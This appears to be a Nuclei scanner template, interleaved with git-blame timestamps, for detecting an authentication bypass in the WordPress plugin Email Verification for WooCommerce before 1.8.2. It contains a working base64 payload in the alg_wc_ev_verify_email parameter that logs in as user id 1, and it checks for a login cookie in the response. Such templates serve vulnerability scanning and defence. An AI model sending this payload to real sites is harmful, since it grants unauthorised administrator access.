2020-09-15 19:25:55 +00:00
|
|
|
id: wp-woocommerce-email-verification
|
2020-09-08 18:27:06 +00:00
|
|
|
info:
|
2020-09-08 11:25:55 +00:00
|
|
|
name: wordpress-emails-verification-for-woocommerce
|
2021-06-09 12:20:56 +00:00
|
|
|
author: random_robbie
|
2020-09-08 11:12:53 +00:00
|
|
|
severity: critical
|
2021-02-16 17:02:57 +00:00
|
|
|
tags: wordpress,wp-plugin
|
2021-04-18 13:11:30 +00:00
|
|
|
description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
|
|
|
|
reference: https://wpvulndb.com/vulnerabilities/10318
|
2020-09-08 18:27:06 +00:00
|
|
|
# GDPR plugin may give a false positive so double check headers
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-08 11:25:55 +00:00
|
|
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
|
|
- "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
2021-10-01 11:01:50 +00:00
|
|
|
|
2021-10-01 01:49:21 +00:00
|
|
|
stop-at-first-match: true
|
2020-09-08 18:27:06 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "wordpress_logged_in"
|
2021-01-11 06:44:22 +00:00
|
|
|
part: header
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 401
|
|
|
|
- 403
|
2021-10-01 01:49:21 +00:00
|
|
|
negative: true
|